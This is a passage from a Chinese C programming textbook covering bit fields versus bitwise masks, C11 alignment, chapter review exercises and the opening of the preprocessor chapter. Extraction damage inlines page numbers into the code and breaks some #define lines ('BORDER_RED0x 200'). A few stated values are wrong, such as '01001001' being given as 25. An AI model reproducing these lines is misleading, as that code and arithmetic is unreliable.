在同类型的编程问题中,位字段和按位运算符是两种可替换的方法,用 哪种方法都可以。例如,前面的例子中,使用和unsigned int类型大小相同的 结构储存图形框的信息。也可使用unsigned int变量储存相同的信息。如果不 想用结构成员表示法来访问不同的部分,也可以使用按位运算符来操作。一 般而言,这种方法比较麻烦。接下来,我们来研究这两种方法(程序中使用 了这两种方法,仅为了解释它们的区别,我们并不鼓励这样做)。 可以通过一个联合把结构方法和位方法放在一起。假定声明了 struct box_props 类型,然后这样声明联合: union Views /* 把数据看作结构或unsigned short类型的变量 */ { struct box_props st_view; unsigned short us_view; }; 在某些系统中,unsigned int和box_props类型的结构都占用16 位内存。 但是,在其他系统中(例如我们使用的系统),unsigned int和box_props都是 32位。无论哪种情况,通过联合,都可以使用 st_view 成员把一块内存看作 是一个结构,或者使用 us_view 成员把相同的内存块看作是一个unsigned short。结构的哪一个位字段与unsigned short中的哪一位对应?这取决于实现 和硬件。下面的程序示例假设从字节的低阶位端到高阶位端载入结构。也就 是说,结构中的第 1 个位字段对应计算机字的0号位(为简化起见,图15.3 以16位单元演示了这种情况)。 1168 图15.3 作为整数和结构的联合 程序清单15.4使用Views联合来比较位字段和按位运算符这两种方法。 在该程序中,box是View联合,所以box.st_view是一个使用位字段的 box_props类型的结构,box.us_view把相同的数据看作是一个unsigned short 类型的变量。联合只允许初始化第1 个成员,所以初始化值必须与结构相匹 配。该程序分别通过两个函数显示 box 的属性,一个函数接受一个结构,一 个函数接受一个 unsigned short 类型的值。这两种方法都能访问数据,但是 所用的技术不同。该程序还使用了本章前面定义的itobs()函数,以二进制字 符串形式显示数据,以便读者查看每个位的开闭情况。 程序清单15.4 dualview.c程序 /* dualview.c -- 位字段和按位运算符 */ #include <stdio.h> #include <stdbool.h> 1169 #include <limits.h> /* 位字段符号常量 */ /* 边框线样式  */ #define SOLID   0 #define DOTTED  1 #define DASHED  2 /* 三原色 */ #define BLUE   4 #define GREEN   2 #define RED    1 /* 混合颜色 */ #define BLACK   0 #define YELLOW  (RED | GREEN) #define MAGENTA  (RED | BLUE) #define CYAN   (GREEN | BLUE) #define WHITE   (RED | GREEN | BLUE) /* 按位方法中用到的符号常量 */ #define OPAQUE     0x1 #define FILL_BLUE   0x8 1170 #define FILL_GREEN   0x4 #define FILL_RED    0x2 #define FILL_MASK   0xE #define BORDER     0x100 #define BORDER_BLUE  0x800 #define BORDER_GREEN  0x400 #define BORDER_RED0x 200 #define BORDER_MASK  0xE00 #define B_SOLID    0 #define B_DOTTED    0x1000 #define B_DASHED    0x2000 #define STYLE_MASK0x 3000 const char * colors[8] = { "black", "red", "green", "yellow", "blue", "magenta", "cyan", "white" }; struct box_props { bool opaque         : 1; unsigned int fill_color  : 3; unsigned int        : 4; 1171 bool show_border      : 1; unsigned int border_color : 3; unsigned int border_style : 2; unsigned int        : 2; }; union 
Views /* 把数据看作结构或unsigned short类型的变量 */ { struct box_props st_view; unsigned short us_view; }; void show_settings(const struct box_props * pb); void show_settings1(unsigned short); char * itobs(int n, char * ps); int main(void) { /* 创建Views联合,并初始化initialize struct box view */ union Views box = { { true, YELLOW, true, GREEN, DASHED } }; char bin_str[8 * sizeof(unsigned int) + 1]; printf("Original box settings:\n"); 1172 show_settings(&box.st_view); printf("\nBox settings using unsigned int view:\n"); show_settings1(box.us_view); printf("bits are %s\n", itobs(box.us_view, bin_str)); box.us_view &= ~FILL_MASK;        /* 把表示填充色的位 清0 */ box.us_view |= (FILL_BLUE | FILL_GREEN);  /* 重置填充色 */ box.us_view ^= OPAQUE;          /* 切换是否透明的位 */ box.us_view |= BORDER_RED;        /* 错误的方法 */ box.us_view &= ~STYLE_MASK;        /* 把样式的位清0 */ box.us_view |= B_DOTTED;         /* 把样式设置为点 */ printf("\nModified box settings:\n"); show_settings(&box.st_view); printf("\nBox settings using unsigned int view:\n"); show_settings1(box.us_view); printf("bits are %s\n", itobs(box.us_view, bin_str)); return 0; 1173 } void show_settings(const struct box_props * pb) { printf("Box is %s.\n", pb->opaque == true ? "opaque" : "transparent"); printf("The fill color is %s.\n", colors[pb->fill_color]); printf("Border %s.\n", pb->show_border == true ? "shown" : "not shown"); printf("The border color is %s.\n", colors[pb->border_color]); printf("The border style is "); switch (pb->border_style) { case SOLID: printf("solid.\n"); break; case DOTTED: printf("dotted.\n"); break; case DASHED: printf("dashed.\n"); break; default:   printf("unknown type.\n"); } } void show_settings1(unsigned short us) 1174 { printf("box is %s.\n", (us & OPAQUE) == OPAQUE ? "opaque" : "transparent"); printf("The fill color is %s.\n", colors[(us >> 1) & 07]); printf("Border %s.\n", (us & BORDER) == BORDER ? "shown" : "not shown"); printf("The border style is "); switch (us & STYLE_MASK) { case B_SOLID : printf("solid.\n"); break; case B_DOTTED : printf("dotted.\n"); break; case B_DASHED : printf("dashed.\n"); break; default    : printf("unknown type.\n"); } printf("The border color is %s.\n", colors[(us >> 9) & 07]); } char * itobs(int n, char * ps) 1175 { int i; const static int size = CHAR_BIT * sizeof(int); for (i = size - 1; i >= 0; i--, n >>= 1) ps[i] = (01 & n) + '0'; ps[size] = '\0'; return ps; } 下面是该程序的输出: Original box settings: Box is opaque. The fill color is yellow. Border shown. The border color is green. The border style is dashed. Box settings using unsigned int view: box is opaque. The fill color is yellow. Border shown. 1176 The border style is dashed. The border color is green. bits are 00000000000000000010010100000111 Modified box settings: Box is transparent. The fill color is cyan. Border shown. The border color is yellow. The border style is dotted. Box settings using unsigned int view: box is transparent. The fill color is cyan. Border not shown. The border style is dotted. The border color is yellow. 
bits are 00000000000000000001011100001100 这里要讨论几个要点。位字段视图和按位视图的区别是,按位视图需要 位置信息。例如,程序中使用BLUE表示蓝色,该符号常量的数值为4。但 是,由于结构排列数据的方式,实际储存蓝色设置的是3号位(位的编号从0 开始,参见图15.1),而且储存边框为蓝色的设置是11号位。因此,该程序 1177 定义了一些新的符号常量: #define FILL_BLUE   0x8 #define BORDER_BLUE  0x800 这里,0x8是3号位为1时的值,0x800是11号位为1时的值。可以使用第1 个符号常量设置填充色的蓝色位,用第2个符号常量设置边框颜色的蓝色 位。用十六进制记数法更容易看出要设置二进制的哪一位,由于十六进制的 每一位代表二进制的4位,那么0x8的位组合是1000,而0x800的位组合是 10000000000,0x800的位组合比0x8后面多8个0。但是以等价的十进制来看 就没那么明显,0x8是8,0x800是2048。 如果值是2的幂,那么可以使用左移运算符来表示值。例如,可以用下 面的#define分别替换上面的#define: #define FILL_BLUE   1<<3 #define BORDER_BLUE  1<<11 这里,<<的右侧是2的指数,也就是说,0x8是23,0x800是211。同样, 表达式1<<n指的是第n位为1的整数。1<<11是常量表达式,在编译时求值。 可以使用枚举代替#defined创建符号常量。例如,可以这样做: enum { OPAQUE = 0x1, FILL_BLUE = 0x8, FILL_GREEN = 0x4, FILL_RED = 0x2, FILL_MASK = 0xE, BORDER = 0x100, BORDER_BLUE = 0x800, BORDER_GREEN = 0x400, BORDER_RED = 0x200, BORDER_MASK = 0xE00, B_DOTTED = 0x1000, B_DASHED = 0x2000, STYLE_MASK = 0x3000}; 1178 如果不想创建枚举变量,就不用在声明中使用标记。 注意,按位运算符改变设置更加复杂。例如,要设置填充色为青色。只 打开蓝色位和绿色位是不够的: box.us_view |= (FILL_BLUE | FILL_GREEN); /* 重置填充色 */ 问题是该颜色还依赖于红色位的设置。如果已经设置了该位(比如对于 黄色),这行代码保留了红色位的设置,而且还设置了蓝色位和绿色位,结 果是产生白色。解决这个问题最简单的方法是在设置新值前关闭所有的颜色 位。因此,程序中使用了下面两行代码: box.us_view &= ~FILL_MASK;        /* 把表示填充色的位 清0 */ box.us_view |= (FILL_BLUE | FILL_GREEN);  /* 重置填充色 */ 如果不先关闭所有的相关位,程序中演示了这种情况: box.us_view |= BORDER_RED;   /* 错误的方法 */ 因为BORDER_GREEN位已经设置过了,所以结果颜色是 BORDER_GREEN | BORDER_RED,被解释为黄色。 这种情况下,位字段版本更简单: box.st_view.fill_color = CYAN; /*等价的位字段方法 */ 这种方法不用先清空所有的位。而且,使用位字段成员时,可以为边框 和框内填充色使用相同的颜色值。但是用按位运算符的方法则要使用不同的 值(这些值反映实际位的位置)。 其次,比较下面两个打印语句: printf("The border color is %s.\n", colors[pb->border_color]); 1179 printf("The border color is %s.\n", colors[(us >> 9) & 07]); 第1条语句中,表达式pb->border_color的值在0~7的范围内,所以该表 达式可用作colors数组的索引。用按位运算符获得相同的信息更加复杂。一 种方法是使用ui>>9把边框颜色右移至最右端(0号位~2号位),然后把该 值与掩码07组合,关闭除了最右端3位以外所有的位。这样结果也在0~7的 范围内,可作为colors数组的索引。 警告 位字段和位的位置之间的相互对应因实现而异。例如,在早期的 Macintosh PowerPC上运行程序清单15.4,输出如下: Original box settings: Box is opaque. The fill color is yellow. Border shown. The border color is green. The border style is dashed. Box settings using unsigned int view: box is transparent. The fill color is black. Border not shown. The border style is solid. The border color is black. 1180 bits are 10110000101010000000000000000000 Modified box settings: Box is opaque. The fill color is yellow. Border shown. The border color is green. The border style is dashed. Box settings using unsigned int view: box is opaque. The fill color is cyan. Border shown. The border style is dotted. The border color is red. 
bits are 10110000101010000001001000001101 该输出的二进制位与程序示例15.4不同,Macintosh PowerPC把结构载入 内存的方式不同。特别是,它把第1位字段载入最高阶位,而不是最低阶 位。所以结构表示法储存在前16位(与PC中的顺序不同),而unsigned int表 示法则储存在后16位。因此,对于Macintosh,程序清单15.4中关于位的位置 的假设是错误的,使用按位运算符改变透明设置和填充色设置时,也弄错了 位。 1181 15.5 对齐特性(C11) C11 的对齐特性比用位填充字节更自然,它们还代表了C在处理硬件相 关问题上的能力。在这种上下文中,对齐指的是如何安排对象在内存中的位 置。例如,为了效率最大化,系统可能要把一个 double 类型的值储存在4 字 节内存地址上,但却允许把char储存在任意地址。大部分程序员都对对齐不 以为然。但是,有些情况又受益于对齐控制。例如,把数据从一个硬件位置 转移到另一个位置,或者调用指令同时操作多个数据项。 _Alignof运算符给出一个类型的对齐要求,在关键字_Alignof后面的圆括 号中写上类型名即可: size_t d_align = _Alignof(float); 假设d_align的值是4,意思是float类型对象的对齐要求是4。也就是说, 4是储存该类型值相邻地址的字节数。一般而言,对齐值都应该是2的非负整 数次幂。较大的对齐值被称为stricter或stronger,较小的对齐值被称为 weaker。 可以使用_Alignas 说明符指定一个变量或类型的对齐值。但是,不应该 要求该值小于基本对齐值。例如,如果float类型的对齐要求是4,不要请求 其对齐值是1或2。该说明符用作声明的一部分,说明符后面的圆括号内包含 对齐值或类型: _Alignas(double) char c1; _Alignas(8) char c2; unsigned char _Alignas(long double) c_arr[sizeof(long double)]; 注意 撰写本书时,Clang(3.2版本)要求_Alignas(type)说明符在类型说明符 后面,如上面第3行代码所示。但是,无论_Alignas(type)说明符在类型说明 1182 符的前面还是后面,GCC 4.7.3都能识别,后来Clang 3.3 版本也支持了这两 种顺序。 程序清单15.5中的程序演示了_Alignas和_Alignof的用法。 程序清单15.5 align.c程序 // align.c -- 使用 _Alignof 和 _Alignas (C11) #include <stdio.h> int main(void) { double dx; char ca; char cx; double dz; char cb; char _Alignas(double) cz; printf("char alignment:  %zd\n", _Alignof(char)); printf("double alignment: %zd\n", _Alignof(double)); printf("&dx: %p\n", &dx); printf("&ca: %p\n", &ca); printf("&cx: %p\n", &cx); 1183 printf("&dz: %p\n", &dz); printf("&cb: %p\n", &cb); printf("&cz: %p\n", &cz); return 0; } 该程序的输出如下: char alignment: 1 double alignment: 8 &dx: 0x7fff5fbff660 &ca: 0x7fff5fbff65f &cx: 0x7fff5fbff65e &dz: 0x7fff5fbff650 &cb: 0x7fff5fbff64f &cz: 0x7fff5fbff648 在我们的系统中,double的对齐值是8,这意味着地址的类型对齐可以 被8整除。以0或8结尾的十六进制地址可被8整除。这就是地址常用两个 double类型的变量和char类型的变量cz(该变量是double对齐值)。因为char 的对齐值是1,对于普通的char类型变量,编译器可以使用任何地址。 在程序中包含 stdalign.h 头文件后,就可以把 alignas 和 alignof 分别作为 _Alignas 和_Alignof的别名。这样做可以与C++关键字匹配。 1184 C11在stdlib.h库还添加了一个新的内存分配函数,用于对齐动态分配的 内存。该函数的原型如下: void *aligned_alloc(size_t alignment, size_t size); 第1个参数代表指定的对齐,第2个参数是所需的字节数,其值应是第1 个参数的倍数。与其他内存分配函数一样,要使用free()函数释放之前分配 的内存。 1185 15.6 关键概念 C 区别于许多高级语言的特性之一是访问整数中单独位的能力。该特性 通常是与硬件设备和操作系统交互的关键。 C有两种访问位的方法。一种方法是通过按位运算符,另一种方法是在 结构中创建位字段。 C11新增了检查内存对齐要求的功能,而且可以指定比基本对齐值更大 的对齐值。 通常(但不总是),使用这些特性的程序仅限于特定的硬件平台或操作 系统,而且设计为不可移植的。 1186 15.7 本章小结 计算硬件与二进制记数系统密不可分,因为二进制数的1和0可用于表示 计算机内存和寄存器中位的开闭状态。虽然C不允许以二进制形式书写数 字,但是它识别与二进制相关的八进制和十六进制记数法。正如每个二进制 数字表示1位一样,每个八进制位代表3位,每个十六进制位代表4位。这种 关系使得二进制转为八进制或十六进制较为简单。 C 提供多种按位运算符,之所以称为按位是因为它们单独操作一个值中 的每个位。~运算符将其运算对象的每一位取反,将1转为0,0转为1。按位 与运算符(&)通过两个运算对象形成一个值。如果两运算对象中相同号位 都为1,那么该值中对应的位为1;否则,该位为0。按位或运算符(|)同样 通过两个运算对象形成一个值。如果两运算对象中相同号位有一个为1或都 为1,那么该值中对应的位为1;否则,该位为0。按位异或运算符(^)也有 类似的操作,只有两运算对象中相同号位有一个为1时,结果值中对应的位 才为1。 C还有左移(<<)和右移(>>)运算符。这两个运算符使位组合中的所 有位都向左或向右移动指定数量的位,以形成一个新值。对于左移运算符, 空出的位置设为 0。对于右移运算符,如果是无符号类型的值,空出的位设 为0;如果是有符号类型的值,右移运算符的行为取决于实现。 可以在结构中使用位字段操控一个值中的单独位或多组位。具体细节因 实现而异。 可以使用_Alignas强制执行数据存储区上的对齐要求。 这些位工具帮助C程序处理硬件问题,因此它们通常用于依赖实现的场 合中。 1187 15.8 复习题 复习题的参考答案在附录A中。 1.把下面的十进制转换为二进制: a.3 b.13 c.59 d.119 2.将下面的二进制值转换为十进制、八进制和十六进制的形式: a.00010101 b.01010101 c.01001100 d.10011101 3.对下面的表达式求值,假设每个值都为8位: a.~3 b.3 & 6 c.3 | 6 d.1 | 6 e.3 ^ 6 f.7 >> 1 1188 g.7 << 2 4.对下面的表达式求值,假设每个值都为8位: a.~0 b.!0 c.2 & 4 d.2 && 4 e.2 | 4 f.2 || 4 g.5 << 3 5.因为ASCII码只使用最后7位,所以有时需要用掩码关闭其他位,其相 应的二进制掩码是什么?分别用十进制、八进制和十六进制来表示这个掩 码。 6.程序清单15.2中,可以把下面的代码: while (bits-- > 0) { mask |= bitval; bitval <<= 1; } 替换成: while (bits-- > 0) 1189 { mask += bitval; bitval *= 2; } 程序照常工作。这是否意味着*=2等同于<<=1?+=是否等同于|=? 
7.a.Tinkerbell计算机有一个硬件字节可读入程序。该字节包含以下信 息: Tinkerbell和IBM PC一样,从右往左填充结构位字段。创建一个适合存 放这些信息的位字段模板。 b.Klinkerbell与Tinkerbell类似,但是它从左往右填充结构位字段。请为 Klinkerbell创建一个相应的位字段模板。 1190 15.9 编程练习 1.编写一个函数,把二进制字符串转换为一个数值。例如,有下面的语 句: char * pbin = "01001001"; 那么把pbin作为参数传递给该函数后,它应该返回一个int类型的值25。 2.编写一个程序,通过命令行参数读取两个二进制字符串,对这两个二 进制数使用~运算符、&运算符、|运算符和^运算符,并以二进制字符串形 式打印结果(如果无法使用命令行环境,可以通过交互式让程序读取字符 串)。 3.编写一个函数,接受一个 int 类型的参数,并返回该参数中打开位的 数量。在一个程序中测试该函数。 4.编写一个程序,接受两个int类型的参数:一个是值;一个是位的位 置。如果指定位的位置为1,该函数返回1;否则返回0。在一个程序中测试 该函数。 5.编写一个函数,把一个 unsigned int 类型值中的所有位向左旋转指定数 量的位。例如,rotate_l(x, 4)把x中所有位向左移动4个位置,而且从最左端 移出的位会重新出现在右端。也就是说,把高阶位移出的位放入低阶位。在 一个程序中测试该函数。 6.设计一个位字段结构以储存下面的信息。 字体ID:0~255之间的一个数; 字体大小:0~127之间的一个数; 对齐:0~2之间的一个数,表示左对齐、居中、右对齐; 1191 加粗:开(1)或闭(0); 斜体:开(1)或闭(0); 在一个程序中使用该结构来打印字体参数,并使用循环菜单来让用户改 变参数。例如,该程序的一个运行示例如下: 1192 1193 该程序要使用按位与运算符(&)和合适的掩码来把字体ID和字体大小 信息转换到指定的范围内。 7.编写一个与编程练习 6 功能相同的程序,使用 unsigned long 类型的变 量储存字体信息,并且使用按位运算符而不是位成员来管理这些信息。 1194 第16章 C预处理器和C库 本章介绍以下内容: 预处理指令:#define、#include、#ifdef、#else、#endif、#ifndef、#if、 #elif、#line、#error、#pragma 关键字:_Generic、_Noreturn、_Static_assert 函数/宏:sqrt()、atan()、atan2()、exit()、atexit()、assert()、memcpy()、 memmove()、va_start()、va_arg()、va_copy()、va_end() C预处理器的其他功能 通用选择表达式 内联函数 C库概述和一些特殊用途的方便函数 C语言建立在适当的关键字、表达式、语句以及使用它们的规则上。然 而,C标准不仅描述C语言,还描述如何执行C预处理器、C标准库有哪些函 数,以及详述这些函数的工作原理。本章将介绍C预处理器和C库,我们先 从C预处理器开始。 C预处理器在程序执行之前查看程序(故称之为预处理器)。根据程序 中的预处理器指令,预处理器把符号缩写替换成其表示的内容。预处理器可 以包含程序所需的其他文件,可以选择让编译器查看哪些代码。预处理器并 不知道 C。基本上它的工作是把一些文本转换成另外一些文本。这样描述预 处理器无法体现它的真正效用和价值,我们将在本章举例说明。前面的程序 示例中也有很多#define和#include的例子。下面,我们先总结一下已学过的 预处理指令,再介绍一些新的知识点。 1195 16.1 翻译程序的第一步 在预处理之前,编译器必须对该程序进行一些翻译处理。首先,编译器 把源代码中出现的字符映射到源字符集。该过程处理多字节字符和三字符序 列——字符扩展让C更加国际化(详见附录B“参考资料VII,扩展字符支 持”)。 第二,编译器定位每个反斜杠后面跟着换行符的实例,并删除它们。也 就是说,把下面两个物理行(physical line): printf("That's wond\ erful!\n"); 转换成一个逻辑行(logical line): printf("That's wonderful\n!"); 注意,在这种场合中,“换行符”的意思是通过按下Enter键在源代码文件 中换行所生成的字符,而不是指符号表征\n。 由于预处理表达式的长度必须是一个逻辑行,所以这一步为预处理器做 好了准备工作。一个逻辑行可以是多个物理行。 第三,编译器把文本划分成预处理记号序列、空白序列和注释序列(记 号是由空格、制表符或换行符分隔的项,详见16.2.1)。这里要注意的是, 编译器将用一个空格字符替换每一条注释。因此,下面的代码: int/* 这看起来并不像一个空格*/fox; 将变成: int fox; 而且,实现可以用一个空格替换所有的空白字符序列(不包括换行 1196 符)。最后,程序已经准备好进入预处理阶段,预处理器查找一行中以#号 开始的预处理指令。 1197 16.2 明示常量:#define #define预处理器指令和其他预处理器指令一样,以#号作为一行的开 始。ANSI和后来的标准都允许#号前面有空格或制表符,而且还允许在#和 指令的其余部分之间有空格。但是旧版本的C要求指令从一行最左边开始, 而且#和指令其余部分之间不能有空格。指令可以出现在源文件的任何地 方,其定义从指令出现的地方到该文件末尾有效。我们大量使用#define指令 来定义明示常量(manifest constant)(也叫做符号常量),但是该指令还有 许多其他用途。程序清单16.1演示了#define指令的一些用法和属性。 预处理器指令从#开始运行,到后面的第1个换行符为止。也就是说,指 令的长度仅限于一行。然而,前面提到过,在预处理开始前,编译器会把多 行物理行处理为一行逻辑行。 程序清单16.1 preproc.c程序 /* preproc.c -- 简单的预处理示例 */ #include <stdio.h> #define TWO 2   /* 可以使用注释 */ #define OW "Consistency is the last refuge of the unimagina\ tive.- Oscar Wilde" /* 反斜杠把该定义延续到下一行 */ #define FOUR TWO*TWO #define PX printf("X is %d.\n", x) #define FMT "X is %d.\n" int main(void) { 1198 int x = TWO; PX; x = FOUR; printf(FMT, x); printf("%s\n", OW); printf("TWO: OW\n"); return 0; } 每行#define(逻辑行)都由3部分组成。第1部分是#define指令本身。第 2部分是选定的缩写,也称为宏。有些宏代表值(如本例),这些宏被称为 类对象宏(object-like macro)。C 语言还有类函数宏(function-like macro),稍后讨论。宏的名称中不允许有空格,而且必须遵循C变量的命 名规则:只能使用字符、数字和下划线(_)字符,而且首字符不能是数 字。第3部分(指令行的其余部分)称为替换列表或替换体(见图16.1)。 一旦预处理器在程序中找到宏的示实例后,就会用替换体代替该宏(也有例 外,稍后解释)。从宏变成最终替换文本的过程称为宏展开(macro expansion)。注意,可以在#define行使用标准C注释。如前所述,每条注释 都会被一个空格代替。 1199 图16.1 类对象宏定义的组成 运行该程序示例后,输出如下: X is 2. X is 4. 
Consistency is the last refuge of the unimaginative.- Oscar Wilde TWO: OW 下面分析具体的过程。下面的语句: int x = TWO; 变成了: int x = 2; 2代替了TWO。而语句: PX; 变成了: printf("X is %d.\n", x); 这里同样进行了替换。这是一个新用法,到目前为止我们只是用宏来表 示明示常量。从该例中可以看出,宏可以表示任何字符串,甚至可以表示整 个 C 表达式。但是要注意,虽然 PX 是一个字符串常量,它只打印一个名为 x的变量。 下一行也是一个新用法。读者可能认为FOUR被替换成4,但是实际的 过程是: x = FOUR; 1200 变成了: x = TWO*TWO; 即是: x = 2*2; 宏展开到此处为止。由于编译器在编译期对所有的常量表达式(只包含 常量的表达式)求值,所以预处理器不会进行实际的乘法运算,这一过程在 编译时进行。预处理器不做计算,不对表达式求值,它只进行替换。 注意,宏定义还可以包含其他宏(一些编译器不支持这种嵌套功能)。 程序中的下一行: printf (FMT, x); 变成了: printf("X is %d.\n",x); 相应的字符串替换了 FMT。如果要多次使用某个冗长的字符串,这种 方法比较方便。另外,也可以用下面的方法: const char * fmt = "X is %d.\n"; 然后可以把fmt作为printf()的格式字符串。 下一行中,用相应的字符串替换OW。双引号使替换的字符串成为字符 串常量。编译器把该字符串储存在以空字符结尾的数组中。因此,下面的指 令定义了一个字符常量: #define HAL 'Z' 而下面的指令则定义了一个字符串(Z\0): 1201 #define HAP "Z" 在程序示例16.1中,我们在一行的结尾加一个反斜杠字符使该行扩展至 下一行: #define OW "Consistency is the last refuge of the unimagina\ tive.- Oscar Wilde" 注意,第2行要与第1行左对齐。如果这样做: #define OW "Consistency is the last refuge of the unimagina\ tive.- Oscar Wilde" 那么输出的内容是: Consistency is the last refuge of the unimagina tive.- Oscar Wilde 第2行开始到tive之间的空格也算是字符串的一部分。 一般而言,预处理器发现程序中的宏后,会用宏等价的替换文本进行替 换。如果替换的字符串中还包含宏,则继续替换这些宏。唯一例外的是双引 号中的宏。因此,下面的语句: printf("TWO: OW"); 打印的是TWO: OW,而不是打印: 2: Consistency is the last refuge of the unimaginative.- Oscar Wilde 要打印这行,应该这样写: printf("%d: %s\n", TWO, OW); 这行代码中,宏不在双引号内。 1202 那么,何时使用字符常量?对于绝大部分数字常量,应该使用字符常 量。如果在算式中用字符常量代替数字,常量名能更清楚地表达该数字的含 义。如果是表示数组大小的数字,用符号常量后更容易改变数组的大小和循 环次数。如果数字是系统代码(如,EOF),用符号常量表示的代码更容易 移植(只需改变EOF的定义)。助记、易更改、可移植,这些都是符号常量 很有价值的特性。 C语言现在也支持const关键字,提供了更灵活的方法。用const可以创建 在程序运行过程中不能改变的变量,可具有文件作用域或块作用域。另一方 面,宏常量可用于指定标准数组的大小和const变量的初始值。 #define LIMIT 20 const int LIM = 50; static int data1[LIMIT];    // 有效 static int data2[LIM];     // 无效 const int LIM2 = 2 * LIMIT;  // 有效 const int LIM3 = 2 * LIM;   // 无效 这里解释一下上面代码中的“无效”注释。在C中,非自动数组的大小应 该是整型常量表达式,这意味着表示数组大小的必须是整型常量的组合(如 5)、枚举常量和sizeof表达式,不包括const声明的值(这也是C++和C的区 别之一,在C++中可以把const值作为常量表达式的一部分)。但是,有的实 现可能接受其他形式的常量表达式。例如,GCC 4.7.3不允许data2的声明, 但是Clang 4.6允许。 16.2.1 记号 从技术角度来看,可以把宏的替换体看作是记号(token)型字符串, 而不是字符型字符串。C预处理器记号是宏定义的替换体中单独的“词”。用 1203 空白把这些词分开。例如: #define FOUR 2*2 该宏定义有一个记号:2*2序列。但是,下面的宏定义中: #define SIX 2 * 3 有3个记号:2、*、3。 替换体中有多个空格时,字符型字符串和记号型字符串的处理方式不 同。考虑下面的定义: #define EIGHT 4 * 8 如果预处理器把该替换体解释为字符型字符串,将用4 * 8替换EIGHT。 即,额外的空格是替换体的一部分。如果预处理器把该替换体解释为记号型 字符串,则用3个的记号4 * 8(分别由单个空格分隔)来替换EIGHT。换而 言之,解释为字符型字符串,把空格视为替换体的一部分;解释为记号型字 符串,把空格视为替换体中各记号的分隔符。在实际应用中,一些C编译器 把宏替换体视为字符串而不是记号。在比这个例子更复杂的情况下,两者的 区别才有实际意义。 顺带一提,C编译器处理记号的方式比预处理器复杂。由于编译器理解 C语言的规则,所以不要求代码中用空格来分隔记号。例如,C编译器可以 把2*2直接视为3个记号,因为它可以识别2是常量,*是运算符。 16.2.2 重定义常量 假设先把LIMIT定义为20,稍后在该文件中又把它定义为25。这个过程 称为重定义常量。不同的实现采用不同的重定义方案。除非新定义与旧定义 相同,否则有些实现会将其视为错误。另外一些实现允许重定义,但会给出 警告。ANSI标准采用第1种方案,只有新定义和旧定义完全相同才允许重定 义。 1204 具有相同的定义意味着替换体中的记号必须相同,且顺序也相同。因 此,下面两个定义相同: #define SIX 2 * 3 #define SIX 2 * 3 这两条定义都有 3 个相同的记号,额外的空格不算替换体的一部分。而 下面的定义则与上面两条宏定义不同: #define SIX 2*3 这条宏定义中只有一个记号,因此与前两条定义不同。如果需要重定义 宏,使用#undef 指令(稍后讨论)。 如果确实需要重定义常量,使用const关键字和作用域规则更容易些。 1205 16.3 在#define中使用参数 在#define中使用参数可以创建外形和作用与函数类似的类函数宏。带有 参数的宏看上去很像函数,因为这样的宏也使用圆括号。类函数宏定义的圆 括号中可以有一个或多个参数,随后这些参数出现在替换体中,如图16.2所 示。 图16.2 函数宏定义的组成 下面是一个类函数宏的示例: #define SQUARE(X) X*X 在程序中可以这样用: z = SQUARE(2); 这看上去像函数调用,但是它的行为和函数调用完全不同。程序清单 16.2演示了类函数宏和另一个宏的用法。该示例中有一些陷阱,请读者仔细 阅读序。 程序清单16.2 mac_arg.c程序 /* mac_arg.c -- 带参数的宏 */ #include <stdio.h> #define SQUARE(X) X*X 1206 #define PR(X)  printf("The result is %d.\n", X) int main(void) { int x = 5; int z; printf("x = %d\n", x); z = SQUARE(x); printf("Evaluating SQUARE(x): "); PR(z); z = SQUARE(2); printf("Evaluating 
SQUARE(2): "); PR(z); printf("Evaluating SQUARE(x+2): "); PR(SQUARE(x + 2)); printf("Evaluating 100/SQUARE(2): "); PR(100 / SQUARE(2)); printf("x is %d.\n", x); printf("Evaluating SQUARE(++x): "); PR(SQUARE(++x)); 1207 printf("After incrementing, x is %x.\n", x); return 0; } SQUARE宏的定义如下: #define SQUARE(X) X*X 这里,SQUARE 是宏标识符,SQUARE(X)中的 X 是宏参数,X*X 是替 换列表。程序清单 16.2 中出现SQUARE(X)的地方都会被X*X替换。这与前 面的示例不同,使用该宏时,既可以用X,也可以用其他符号。宏定义中的 X由宏调用中的符号代替。因此,SQUARE(2)替换为2*2,X实际上起到参数 的作用。 然而,稍后你将看到,宏参数与函数参数不完全相同。下面是程序的输 出。注意有些内容可能与我们的预期不符。实际上,你的编译器输出甚至与 下面的结果完全不同。 x = 5 Evaluating SQUARE(x): The result is 25. Evaluating SQUARE(2): The result is 4. Evaluating SQUARE(x+2): The result is 17. Evaluating 100/SQUARE(2): The result is 100. x is 5. Evaluating SQUARE(++x): The result is 42. After incrementing, x is 7. 1208 前两行与预期相符,但是接下来的结果有点奇怪。程序中设置x的值为 5,你可能认为SQUARE(x+2)应该是 7*7,即 49。但是,输出的结果是 17, 这不是一个平方值!导致这样结果的原因是,我们前面提到过,预处理器不 做计算、不求值,只替换字符序列。预处理器把出现x的地方都替换成x+2。 因此,x*x变成了x+2*x+2。如果x为5,那么该表达式的值为: 5+2*5+2 = 5 + 10 + 2 = 17 该例演示了函数调用和宏调用的重要区别。函数调用在程序运行时把参 数的值传递给函数。宏调用在编译之前把参数记号传递给程序。这两个不同 的过程发生在不同时期。是否可以修改宏定义让SQUARE(x+2)得36?当然 可以,要多加几个圆括号: #define SQUARE(x) (x)*(x) 现在SQUARE(x+2)变成了(x+2)*(x+2),在替换字符串中使用圆括号就得 到符合预期的乘法运算。 但是,这并未解决所有的问题。下面的输出行: 100/SQUARE(2) 将变成: 100/2*2 根据优先级规则,从左往右对表达式求值:(100/2)*2,即50*2,得 100。把SQUARE(x)定义为下面的形式可以解决这种混乱: #define SQUARE(x) (x*x) 这样修改定义后得100/(2*2),即100/4,得25。 要处理前面的两种情况,要这样定义: 1209 #define SQUARE(x) ((x)*(x)) 因此,必要时要使用足够多的圆括号来确保运算和结合的正确顺序。 尽管如此,这样做还是无法避免程序中最后一种情况的问题。 SQUARE(++x)变成了++x*++x,递增了两次x,一次在乘法运算之前,一次 在乘法运算之后: ++x*++x = 6*7 = 42 由于标准并未对这类运算规定顺序,所以有些编译器得 7*6。而有些编 译器可能在乘法运算之前已经递增了x,所以7*7得49。在C标准中,对该表 达式求值的这种情况称为未定义行为。无论哪种情况,x的开始值都是5,虽 然从代码上看只递增了一次,但是x的最终值是7。 解决这个问题最简单的方法是,避免用++x 作为宏参数。一般而言,不 要在宏中使用递增或递减运算符。但是,++x可作为函数参数,因为编译器 会对++x求值得5后,再把5传递给函数。 16.3.1 用宏参数创建字符串:#运算符 下面是一个类函数宏: #define PSQR(X) printf("The square of X is %d.\n", ((X)*(X))); 假设这样使用宏: PSQR(8); 输出为: The square of X is 64. 注意双引号字符串中的X被视为普通文本,而不是一个可被替换的记 号。 